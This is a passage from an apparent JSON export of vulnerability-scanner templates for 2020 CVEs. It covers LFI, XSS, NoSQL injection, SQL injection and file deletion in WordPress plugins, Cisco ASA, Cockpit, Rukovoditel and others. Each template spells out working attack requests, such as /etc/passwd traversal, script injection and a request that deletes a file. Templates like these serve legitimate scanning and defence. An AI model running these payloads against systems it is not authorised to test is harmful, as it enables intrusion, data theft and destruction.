status:\n - 200\n# digest: 4b0a00483046022100908e8f49353459e425b78f84c48a3efbe2ecad152c2a624e2e70b0eeb7d03276022100d679f9d150a3e04b488914d12e3cc57b7c1c89f983a0adc5e35f4dc5310b70ac:922c64590222798bb761d5b6d8e72950", "hash": "4a1a5834fa633eff249773eeec62771d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308210" }, "name": "CVE-2020-35749.yaml", "content": "id: CVE-2020-35749\n\ninfo:\n name: WordPress Simple Job Board <2.9.4 - Local File Inclusion\n author: cckuailong\n severity: high\n description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability 
(such as HR users) to download arbitrary files from the web-server via local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.\n remediation: |\n Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35749\n - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing\n - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-35749\n cwe-id: CWE-22\n epss-score: 0.02144\n epss-percentile: 0.88116\n cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: presstigers\n product: simple_board_job\n framework: wordpress\n tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205aa1631c11bb3beabb3041432b1abbac3a39611e4086b7f525da85e83f48fc0002205cdd1e5fdfa1abe2fd05dd3722e4975de5913462464aaf925db798da8eac1374:922c64590222798bb761d5b6d8e72950", "hash": "8d2e46aee61ab6d37876e5086e0d4764", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308211" }, "name": "CVE-2020-35774.yaml", 
"content": "id: CVE-2020-35774\n\ninfo:\n name: twitter-server Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.\n remediation: |\n Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability.\n reference:\n - https://advisory.checkmarx.net/advisory/CX-2020-4287\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35774\n - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c\n - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35774\n cwe-id: CWE-79\n epss-score: 0.97225\n epss-percentile: 0.99823\n cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: twitter\n product: twitter-server\n tags: cve2020,cve,xss,twitter-server,twitter\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059aae75a1ba54ffd46128637519495af796f1bf598fe025a5dc99ae09ecfae6102202090450bd8a9fbf4c8c2099543cfa0f00fd5e78700e8995ad0f87ddf92e69c62:922c64590222798bb761d5b6d8e72950", "hash": 
"5b772a32b4b9c8cee3edc300064431c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308212" }, "name": "CVE-2020-3580.yaml", "content": "id: CVE-2020-3580\n\ninfo:\n name: Cisco ASA/FTD Software - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. 
For more information, see the reference links.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://twitter.com/ptswarm/status/1408050644460650502\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3580\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-3580\n cwe-id: CWE-79\n epss-score: 0.97048\n epss-percentile: 0.99705\n cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: firepower_threat_defense\n tags: cve,cve2020,xss,cisco,kev\n\nhttp:\n - raw:\n - |\n POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a22843600fa540dd4035057b8812dca1cabaf0cb179c022be93bcd61aa640a6702200ad6f005a0c0b15427d37ec3fbbb81e0edea63010d20973f1d3760735d993b11:922c64590222798bb761d5b6d8e72950", "hash": "8ddd0f8ee10e8d217ea4b198a2c8d030", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308213" }, "name": "CVE-2020-35846.yaml", "content": "id: CVE-2020-35846\n\ninfo:\n name: Agentejo Cockpit < 0.11.2 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check 
function. The $eq operator matches documents where the value of a field equals the specified value.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35846\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35846\n cwe-id: CWE-89\n epss-score: 0.78767\n epss-percentile: 0.98182\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/check\"\n\n body: |\n {\n \"auth\": {\n \"user\": {\n \"$eq\": \"admin\"\n },\n \"password\": [\n 0\n ]\n }\n }\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"password_verify() expects parameter\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022054a4c1c91d4dc2db65ddab6c58e5ce6ed8009e20d03a321ac03742dfdab22439022100917d48526b787d17f67533ad55a2b0e0d3264e2eb38c019d56255c6a244c707c:922c64590222798bb761d5b6d8e72950", "hash": "09697a34f75d3a22113d2f6d5094e609", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308214" }, "name": "CVE-2020-35847.yaml", "content": "id: CVE-2020-35847\n\ninfo:\n name: Agentejo Cockpit <0.11.2 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: |\n Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php 
resetpassword function of the Auth controller.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35847\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35847\n cwe-id: CWE-89\n epss-score: 0.77399\n epss-percentile: 0.98139\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: agentejo\n product: cockpit\n shodan-query: http.favicon.hash:688609340\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - raw:\n - |\n POST /auth/requestreset HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"user\": {\n \"$func\": \"var_dump\"\n }\n }\n - |\n POST /auth/requestreset HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"user\": {\n \"$func\": \"nonexistent_function\"\n }\n }\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_1\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\"'\n\n - type: regex\n part: body_1\n negative: true\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\"'\n\n - type: regex\n part: body_2\n negative: true\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\"'\n# digest: 
4b0a00483046022100b22461d6f3fb20ee41694adc4d1a172d49954b2fd5e4ffe9b471b7245fc3ebe2022100cf54164abf938038a87d987cc754a82f7fb0325896c2bfe719cb9dd70c139aa1:922c64590222798bb761d5b6d8e72950", "hash": "202a44bad9a10cc9a57bfaade5bff4dc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308215" }, "name": "CVE-2020-35848.yaml", "content": "id: CVE-2020-35848\n\ninfo:\n name: Agentejo Cockpit <0.12.0 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35848\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35848\n cwe-id: CWE-89\n epss-score: 0.75372\n epss-percentile: 0.98077\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/newpassword\"\n\n body: |\n {\n \"token\": {\n \"$func\": \"var_dump\"\n }\n }\n\n headers:\n Content-Type: application/json\n matchers:\n - type: regex\n part: body\n regex:\n - 'string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\"'\n# digest: 
4a0a0047304502204c5e621f8e72efbb78024a1d448302c1b840c428b84bd1d8c46c91a239f8fae40221008c5563e6e9537a8190b64c882918cb880fa670f4410e0ff17c0d132bd4ffb4ab:922c64590222798bb761d5b6d8e72950", "hash": "981254ab02e2b1ef511e5f7fb90ab75d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308216" }, "name": "CVE-2020-35951.yaml", "content": "id: CVE-2020-35951\n\ninfo:\n name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion\n author: princechaddha\n severity: critical\n description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).\n impact: |\n This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.\n remediation: |\n Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.\n reference:\n - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35951\n - https://wpscan.com/vulnerability/10348\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\n cvss-score: 9.9\n cve-id: CVE-2020-35951\n cwe-id: CWE-306\n epss-score: 0.00174\n epss-percentile: 0.54591\n cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 4\n vendor: expresstech\n product: quiz_and_survey_master\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\n Host: {{Hostname}}\n - |\n GET 
/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92\n Content-Disposition: form-data; name=\"action\"\n\n qsm_remove_file_fd_question\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92\n Content-Disposition: form-data; name=\"file_url\"\n\n {{fullpath}}wp-content/plugins/quiz-master-next/README.md\n ------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n - |\n GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')\n\n - type: word\n part: body\n words:\n - '{\"type\":\"success\",\"message\":\"File removed successfully\"}'\n\n extractors:\n - type: regex\n name: fullpath\n group: 1\n regex:\n - not found in ([/a-z_]+)wp\n internal: true\n part: body\n# digest: 4a0a00473045022047234f08b1f0792ea387973f0968ea443be70b6f41de22d81bfae5f90b1cfed1022100d0e2e333c645375e750cd51761840100ba349328a6f6922f694250ae9a2dc721:922c64590222798bb761d5b6d8e72950", "hash": "7fb54196e537065a33fc3cbc07eb049f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308217" }, "name": "CVE-2020-35984.yaml", "content": "id: CVE-2020-35984\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to 
potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/4\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35984\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35984\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950", "hash": "065ad9e646197d2fa7da862e68548d55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308218" }, 
"name": "CVE-2020-35985.yaml", "content": "id: CVE-2020-35985\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Global Lists\" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/3\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35985\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35985\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_lists/lists&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, 
\"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950", "hash": "d4c88a1d829c883f851917296dbd4507", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308219" }, "name": "CVE-2020-35986.yaml", "content": "id: CVE-2020-35986\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/2\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35986\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35986\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.46456\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST 
/index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950", "hash": "9d0b8bef0d1345086efc1a19dcbe43d3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821a" }, "name": "CVE-2020-35987.yaml", "content": "id: CVE-2020-35987\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/r0ck3t1973/rukovoditel/issues/1\n - 
http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35987\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35987\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.47225\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/&action=save HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950", "hash": "5d134a5055028eafc3c5024e17fc53fa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821b" }, "name": "CVE-2020-36112.yaml", "content": "id: CVE-2020-36112\n\ninfo:\n name: CSE Bookstore 1.0 - SQL Injection\n author: geeknik\n severity: critical\n description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection 
in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49314\n - https://www.tenable.com/cve/CVE-2020-36112\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36112\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-36112\n cwe-id: CWE-89\n epss-score: 0.40407\n epss-percentile: 0.9718\n cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cse_bookstore_project\n product: cse_bookstore\n tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project\n\nhttp:\n - raw:\n - |\n GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - \"get book price failed! You have an error in your SQL syntax\"\n - \"Can't retrieve data You have an error in your SQL syntax\"\n condition: or\n# digest: 4a0a0047304502206fa2676792b348fc60ebc9cc70b869fe76ef0386dc78c9e96e3249d4a5cfbc370221008c90f9a9894fb5a251d8ebb984a710b6c11de3f64f43f866135bca21ff6b735e:922c64590222798bb761d5b6d8e72950", "hash": "d7ae19b433600dbbe56a31df725579ca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821c" }, "name": "CVE-2020-36289.yaml", "content": "id: CVE-2020-36289\n\ninfo:\n name: Jira Server and Data Center - Information Disclosure\n author: dhiyaneshDk\n severity: medium\n 